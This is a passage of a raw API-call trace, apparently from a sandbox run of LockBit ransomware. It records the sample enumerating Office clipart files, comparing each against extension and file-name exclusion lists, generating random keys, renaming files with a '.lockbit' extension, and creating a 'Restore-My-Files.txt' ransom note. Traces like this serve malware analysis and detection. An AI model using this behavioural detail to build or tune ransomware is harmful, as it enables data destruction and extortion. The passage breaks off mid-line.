(lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.932] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1f69200, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x60c23530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb1f69200, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x3df0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00296_.WMF", cAlternateFileName="")) returned 1 [0113.932] lstrcmpiW (lpString1=".", lpString2="FD00296_.WMF") returned -1 [0113.932] lstrcmpiW (lpString1="..", lpString2="FD00296_.WMF") returned -1 [0113.932] PathFindExtensionW (pszPath="FD00296_.WMF") returned=".WMF" [0113.932] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.932] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.932] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.932] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.933] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.933] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.933] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.933] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.933] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.933] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.933] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.933] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.933] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.933] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.933] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.933] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.933] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.933] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.933] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.933] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.933] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.933] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.933] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.933] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.934] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.934] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.934] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.934] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.934] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.934] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.934] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.934] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.934] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.934] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.934] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.934] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.934] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.934] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.934] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.934] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.934] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.934] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.934] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.934] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.934] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.934] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.934] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.934] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00296_.WMF") returned 1 [0113.934] lstrcmpiW (lpString1="ntldr", lpString2="FD00296_.WMF") returned 1 [0113.934] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00296_.WMF") returned 1 [0113.934] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00296_.WMF") returned -1 [0113.934] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00296_.WMF") returned -1 [0113.934] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00296_.WMF") returned 1 [0113.934] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00296_.WMF") returned 1 [0113.935] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.935] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF") returned=".WMF" [0113.935] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.935] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.935] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.936] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF.lockbit") returned 72 [0113.936] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00296_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0113.936] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.936] malloc (_Size=0x40068) returned 0x3db04c0 [0113.937] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3db04d8 | out: lpFileSize=0x3db04d8*=15856) returned 1 [0113.937] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.938] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df04f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df04f4) returned 0x0 [0113.938] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.938] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df0504, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df0504) returned 0x0 [0113.938] ReadFile (in: hFile=0x340, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 0x0 [0113.947] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.947] malloc (_Size=0xa6) returned 0x77d7a8 [0113.947] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.947] free (_Block=0x77d7a8) [0113.947] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00296_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.947] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.948] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.948] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54b40e00, ftCreationTime.dwHighDateTime=0x1bd4aee, ftLastAccessTime.dwLowDateTime=0x5226a510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54b40e00, ftLastWriteTime.dwHighDateTime=0x1bd4aee, nFileSizeHigh=0x0, nFileSizeLow=0x4712, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00297_.WMF", cAlternateFileName="")) returned 1 [0113.948] lstrcmpiW (lpString1=".", lpString2="FD00297_.WMF") returned -1 [0113.948] lstrcmpiW (lpString1="..", lpString2="FD00297_.WMF") returned -1 [0113.948] PathFindExtensionW (pszPath="FD00297_.WMF") returned=".WMF" [0113.948] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.948] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.948] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.948] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.948] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.948] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.948] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.948] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.948] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.948] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.948] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.948] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.949] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.949] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.950] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.950] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.950] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.950] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00297_.WMF") returned 1 [0113.950] lstrcmpiW (lpString1="ntldr", lpString2="FD00297_.WMF") returned 1 [0113.950] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00297_.WMF") returned 1 [0113.950] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00297_.WMF") returned -1 [0113.950] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00297_.WMF") returned -1 [0113.950] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00297_.WMF") returned 1 [0113.950] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00297_.WMF") returned 1 [0113.950] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.950] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF") returned=".WMF" [0113.950] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.950] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.950] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.950] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.950] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.950] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.950] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.950] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.950] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.950] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.950] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.950] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.950] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.950] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0113.950] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0113.950] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0113.950] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0113.950] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0113.950] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0113.951] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0113.951] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0113.951] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0113.951] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0113.951] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0113.951] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0113.951] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0113.951] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0113.951] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0113.951] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF.lockbit") returned 72 [0113.951] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00297_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0113.960] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0113.960] malloc (_Size=0x40068) returned 0x3e70008 [0113.960] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=18194) returned 1 [0113.960] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.961] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0113.961] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.961] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0113.961] ReadFile (in: hFile=0x13c0, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0113.965] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0113.965] malloc (_Size=0xa6) returned 0x77d7a8 [0113.965] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0113.966] free (_Block=0x77d7a8) [0113.966] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00297_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0113.966] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0113.966] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0113.966] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c56500, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x60c23530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb0c56500, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0xb6de, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00306_.WMF", cAlternateFileName="")) returned 1 [0113.966] lstrcmpiW (lpString1=".", lpString2="FD00306_.WMF") returned -1 [0113.966] lstrcmpiW (lpString1="..", lpString2="FD00306_.WMF") returned -1 [0113.966] PathFindExtensionW (pszPath="FD00306_.WMF") returned=".WMF" [0113.966] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0113.966] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0113.967] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0113.968] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0113.968] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0113.968] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0113.968] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0113.968] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0113.968] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0113.968] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0113.968] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0113.968] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0113.968] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0113.968] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0113.968] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0113.968] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0113.968] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0113.968] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0113.968] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0113.968] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0113.968] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0113.968] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0113.968] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00306_.WMF") returned 1 [0113.968] lstrcmpiW (lpString1="ntldr", lpString2="FD00306_.WMF") returned 1 [0113.968] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00306_.WMF") returned 1 [0113.968] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00306_.WMF") returned -1 [0113.968] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00306_.WMF") returned -1 [0113.968] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00306_.WMF") returned 1 [0113.968] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00306_.WMF") returned 1 [0113.969] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0113.969] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00306_.WMF") returned=".WMF" [0113.969] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0113.969] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0113.969] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0113.969] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0113.969] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0113.969] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0113.969] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0113.969] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0113.969] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0113.969] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0113.969] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0113.969] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0113.969] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0113.969] lstrcmpiW 